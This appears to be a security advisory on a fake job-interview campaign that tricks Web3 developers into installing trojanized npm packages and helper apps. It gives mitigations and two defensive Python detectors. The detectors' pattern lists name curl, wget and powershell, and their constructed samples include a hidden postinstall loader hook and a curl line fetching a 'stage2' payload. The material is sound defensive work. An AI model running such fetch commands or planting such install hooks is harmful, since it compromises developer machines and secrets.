Fake-interview social-engineering campaign targeting Web3 developers

Attackers are luring Web3 and blockchain developers with fake job interviews, "interview software" and coding tests that instruct the target to clone a repository and install its dependencies. Those dependencies or helper tools are trojanized (malicious npm packages, "camera-fix" helpers, rogue meeting apps) and deliver info-stealers and backdoors that enable crypto theft, credential exfiltration and further supply-chain abuse from the compromised developer machine.

Who’s been observed doing this

Security researchers attribute the largest and most sophisticated campaigns to DPRK-aligned groups (tracked under names such as Lazarus, Contagious Interview and DeceptiveDevelopment), with other financially motivated actors running copycat operations. These operations combine fake recruiter profiles, bespoke "interview" sites and apps, and trojanized open-source packages to get code execution on developer machines.

Tactics, techniques and notable payloads

  • Lure: fake recruiter messages, job offers, or interview invites specifically about Web3/blockchain projects. Targets are often asked to take a coding test or “fix” a webcam/meeting app.
  • Delivery: malicious helper binaries (fake meeting apps / “camera fix” tools), trojanized NPM packages or other dependencies included in test repos, and links to malicious/interview sites.
  • Malware families observed: BeaverTail (JavaScript infostealer/loader, typically hidden in the trojanized repository or npm package), InvisibleFerret (Python backdoor fetched by BeaverTail as a second stage), OtterCookie (JavaScript infostealer/RAT seen in later waves), and other info-stealers, miners and backdoors referenced in reporting.

Why Web3 devs are attractive

  • Control over keys, wallets, build/deploy pipelines and package ecosystems (npm, etc.).
  • Developers are often asked to run build/install scripts or third-party tools during tests — an ideal vector for code execution.

Practical mitigations (for individual devs and small teams) — do these now

  1. Never run unvetted binaries or “camera-fix” helpers. If an interviewer asks you to run a helper, insist on a vetted, signed app or use an isolated environment (ephemeral VM/sandbox).
  2. Install packages only from trusted names and pin versions. Check names for typosquatting (one- or two-character variants of popular packages), commit lockfiles and verify integrity hashes. Disable install-time lifecycle scripts when working with an untrusted repo (npm install --ignore-scripts, or ignore-scripts=true in .npmrc), since preinstall/postinstall hooks are a common place to hide a loader. Note that npm audit only reports known vulnerable versions of legitimate packages and does not detect a trojanized package, so pair it with supply-chain scanners and repository allowlists.
  3. Use ephemeral, disposable environments for take-home tests (cloud builder, container, remote VM) — never run unknown code on a machine holding wallets or secrets.
  4. Protect private keys: keep them in hardware wallets, never on developer machines. Revoke/rotate keys that may have been exposed.
  5. Harden auth: require hardware-key MFA for critical accounts, monitor for new logins, and use conditional access where possible.
  6. Network and endpoint controls: block known malicious domains, use endpoint detection/EDR with YARA/signature rules for BeaverTail/OtterCookie families, and monitor unusual outbound connections.
  7. Vet interview tooling: companies should publish an official list of acceptable meeting apps and interview workflows; recruiters should be verified.
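Steps 2 and 3 above can be turned into a triage pass that runs before anything in the take-home repo executes. The script below is an added example (not code from the original page or from any of the research cited); it inspects a package.json for the three signals these campaigns rely on: lifecycle scripts that run on install, dependencies resolved outside the registry, and names a short edit distance from well-known packages. The sample package.json and the popular-package list are constructed for illustration; a real list would be far longer.

```python
"""Pre-install triage of an untrusted repository's package.json.

Added example, not from the original page. Run it before `npm install`
(ideally inside the disposable environment) and treat any HIGH finding as
a reason not to install at all.
"""
import json
import re

# Hooks npm runs automatically on `npm install` of the root project.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")
# Commands whose presence in an install hook almost always means "run attacker code".
SUSPICIOUS_CMD = re.compile(
    r"\b(curl|wget|powershell|pwsh|bash -c|sh -c|node -e|base64|Invoke-\w+|eval)\b",
    re.IGNORECASE)
# Specifiers that fetch code outside the registry, so neither `npm audit`
# nor a registry allowlist ever sees it.
OFF_REGISTRY = re.compile(r"^(git\+|git:|github:|https?://|file:|\.\./|\./|/)")
# Tiny stand-in for a real list of popular packages (constructed).
POPULAR = ("lodash", "express", "axios", "ethers", "web3", "react", "chalk", "dotenv")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used as a cheap typosquat heuristic."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def triage_package_json(text: str) -> list[str]:
    """Return human-readable findings for one package.json document."""
    pkg = json.loads(text)
    findings = []
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:
            sev = "HIGH" if SUSPICIOUS_CMD.search(cmd) else "MEDIUM"
            findings.append(f"{sev}: lifecycle script '{hook}' runs on install: {cmd!r}")
    deps = {}
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        deps.update(pkg.get(section, {}))
    for name, spec in deps.items():
        if OFF_REGISTRY.match(spec):
            findings.append(f"HIGH: '{name}' resolved outside the registry: {spec!r}")
        base = name.split("/")[-1]  # drop an @scope/ prefix before comparing
        for pop in POPULAR:
            d = edit_distance(base.lower(), pop)
            if 0 < d <= 2:
                findings.append(f"MEDIUM: '{name}' is {d} edit(s) from popular package '{pop}'")
                break
    return findings


# Constructed sample modelled on the lure described above: a "DEX" coding
# task whose postinstall hook runs a hidden JavaScript file and whose
# dependency list mixes a typo of a popular package with a git URL.
SAMPLE_PACKAGE_JSON = r'''{
  "name": "interview-task-dex",
  "version": "1.0.0",
  "scripts": {
    "test": "jest",
    "postinstall": "node -e \"require('./config/.cache.js')\""
  },
  "dependencies": {
    "ethers": "^6.7.0",
    "expres": "^4.18.2",
    "node-wallet-utils": "git+https://example.invalid/helper.git"
  }
}'''

if __name__ == "__main__":
    for line in triage_package_json(SAMPLE_PACKAGE_JSON):
        print(line)
```

The edit-distance check is deliberately crude (it will flag legitimate short names that happen to sit near a popular one), so its findings are rated MEDIUM and meant for a human to read, while a lifecycle hook that shells out or a dependency pulled from a git URL is rated HIGH because there is no benign reason for either in a recruiter-supplied coding test.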

Indicators & detection

  • Requests to npm install unfamiliar packages that are newly published or have suspicious names.
  • Unsolicited "interview" domains on free or short-lived hosting (e.g. Vercel, Netlify) that ask you to download an executable rather than join a standard meeting link.
  • Process chains in which npm/node, a Python runtime or a freshly downloaded helper spawns powershell, curl, wget or a shell, or opens outbound connections to unfamiliar hosts, shortly after the helper tool or install is run.
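The last indicator is a correlation rule rather than a single signature: a developer running curl by hand is normal, while curl spawned a few seconds after npm or node started, followed by a connection to a host that is not the package registry, is not. The code below is an added example (not from the original page or from any EDR vendor) that applies that rule to a constructed set of process-creation and network events in a simplified schema (ts, pid, ppid, image, cmdline or dest_host/dest_port); real Sysmon or EDR records use different field names, and the registry allowlist and the TEST-NET address are placeholders.

```python
"""Correlate process and network telemetry for the 'helper tool spawns a
downloader' pattern listed in the indicators above.

Added example, not from the original page. Event schema, allowlist and the
sample events are constructed for illustration.
"""
from dataclasses import dataclass

DEV_TOOLING = {"node", "node.exe", "npm", "npx", "yarn", "python", "python3"}
FETCHERS = {"curl", "curl.exe", "wget", "powershell.exe", "pwsh", "bash", "sh",
            "cmd.exe", "certutil.exe"}
WINDOW_SECONDS = 300          # how soon after the tool started a child fetcher is suspicious
# Hosts a dev machine is expected to reach during `npm install` (constructed allowlist).
ALLOWED_HOSTS = {"registry.npmjs.org", "github.com", "objects.githubusercontent.com"}


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str
    ts: int


def basename(path: str) -> str:
    """Image name without directory, lower-cased, handling both path separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestors(pid, procs, depth=4):
    """Yield the process with `pid` and its parents, up to `depth` levels."""
    seen = set()
    while pid in procs and pid not in seen and depth:
        seen.add(pid)
        p = procs[pid]
        yield p
        pid, depth = p.ppid, depth - 1


def detect(events: list[dict]) -> list[str]:
    """Replay events in time order and return alert strings."""
    procs, alerts = {}, []
    for e in sorted(events, key=lambda ev: ev["ts"]):
        if e["type"] == "proc":
            p = Proc(e["pid"], e["ppid"], e["image"], e.get("cmdline", ""), e["ts"])
            procs[p.pid] = p
            if basename(p.image) in FETCHERS:
                # Walk up from the parent: is a dev tool that started recently above us?
                for anc in ancestors(p.ppid, procs):
                    if basename(anc.image) in DEV_TOOLING and p.ts - anc.ts <= WINDOW_SECONDS:
                        alerts.append(
                            f"HIGH: {basename(anc.image)} (pid {anc.pid}) -> "
                            f"{basename(p.image)} (pid {p.pid}) {p.ts - anc.ts}s after "
                            f"start: {p.cmdline}")
                        break
        elif e["type"] == "net":
            if e["dest_host"] in ALLOWED_HOSTS:
                continue
            chain = [basename(a.image) for a in ancestors(e["pid"], procs)]
            if any(c in DEV_TOOLING or c in FETCHERS for c in chain):
                alerts.append(
                    f"MEDIUM: pid {e['pid']} ({' <- '.join(chain)}) connected to "
                    f"{e['dest_host']}:{e['dest_port']} outside the install allowlist")
    return alerts


# Constructed events: an `npm install` whose postinstall node process spawns
# curl to a TEST-NET address, plus a benign curl typed directly into the shell.
SAMPLE_EVENTS = [
    {"type": "proc", "ts": 1000, "pid": 100, "ppid": 1, "image": "/bin/zsh", "cmdline": "zsh"},
    {"type": "proc", "ts": 1005, "pid": 101, "ppid": 100, "image": "/usr/local/bin/npm",
     "cmdline": "npm install"},
    {"type": "proc", "ts": 1006, "pid": 102, "ppid": 101, "image": "/usr/local/bin/node",
     "cmdline": "node -e require('./config/.cache.js')"},
    {"type": "proc", "ts": 1010, "pid": 103, "ppid": 102, "image": "/usr/bin/curl",
     "cmdline": "curl -s http://203.0.113.10:8443/stage2 -o /tmp/.npl"},
    {"type": "net", "ts": 1011, "pid": 103, "dest_host": "203.0.113.10", "dest_port": 8443},
    {"type": "net", "ts": 1020, "pid": 101, "dest_host": "registry.npmjs.org", "dest_port": 443},
    {"type": "proc", "ts": 2000, "pid": 200, "ppid": 100, "image": "/usr/bin/curl",
     "cmdline": "curl https://example.com"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a)
```

The registry connection from npm is allowlisted and the user's own curl has only the shell above it, so neither fires; the curl under node does, and its later connection is flagged because the whole ancestor chain is visible at the time the socket opens.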